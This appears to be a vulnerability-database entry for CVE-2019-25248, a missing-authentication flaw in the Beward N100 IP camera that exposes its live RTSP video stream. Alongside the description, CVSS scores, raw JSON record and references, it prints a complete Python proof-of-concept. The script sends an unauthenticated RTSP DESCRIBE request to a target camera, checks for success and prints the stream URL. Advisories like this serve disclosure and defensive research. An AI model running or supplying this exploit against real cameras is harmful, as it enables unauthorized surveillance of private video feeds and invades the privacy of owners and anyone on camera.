Security Vulnerability Report
中文
CVE-2019-25248 CVSS 7.5 HIGH

CVE-2019-25248

Published: 2025-12-24 20:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Beward N100 M2.1.6.04C014 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve the camera's RTSP stream by exploiting the lack of authentication in the video access mechanism.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Beward N100 M2.1.6.04C014

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2019-25248 PoC - Beward N100 Unauthenticated RTSP Stream Access # Usage: python3 cve-2019-25248.py <target_ip> import sys import socket def exploit_beward_rtsp(target_ip, rtsp_port=554): """ Exploit for CVE-2019-25248: Beward N100 Unauthenticated RTSP Stream Access This PoC demonstrates how to access RTSP stream without authentication """ print(f"[*] Target: {target_ip}:{rtsp_port}") print(f"[*] Exploiting CVE-2019-25248...") # Construct RTSP DESCRIBE request without authentication rtsp_describe = f"DESCRIBE rtsp://{target_ip}:{rtsp_port}/live/ch00_0 RTSP/1.0\r\n" rtsp_describe += "CSeq: 1\r\n" rtsp_describe += "User-Agent: Python-RTSP-Client\r\n" rtsp_describe += "Accept: application/sdp\r\n" rtsp_describe += "\r\n" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, rtsp_port)) print("[*] Sending RTSP DESCRIBE request without authentication...") sock.send(rtsp_describe.encode()) response = sock.recv(4096) print(f"[*] Received response ({len(response)} bytes)") print(response.decode('utf-8', errors='ignore')) if "200 OK" in response.decode('utf-8', errors='ignore'): print("[+] SUCCESS: Unauthenticated access to RTSP stream confirmed!") print(f"[+] Video stream URL: rtsp://{target_ip}:{rtsp_port}/live/ch00_0") return True else: print("[-] FAILED: Could not access stream") return False except socket.timeout: print("[-] ERROR: Connection timeout") return False except socket.error as e: print(f"[-] ERROR: {e}") return False finally: sock.close() if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [rtsp_port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 554 exploit_beward_rtsp(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25248", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:53.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beward N100 M2.1.6.04C014 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve the camera's RTSP stream by exploiting the lack of authentication in the video access mechanism."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.beward.net", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46317", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.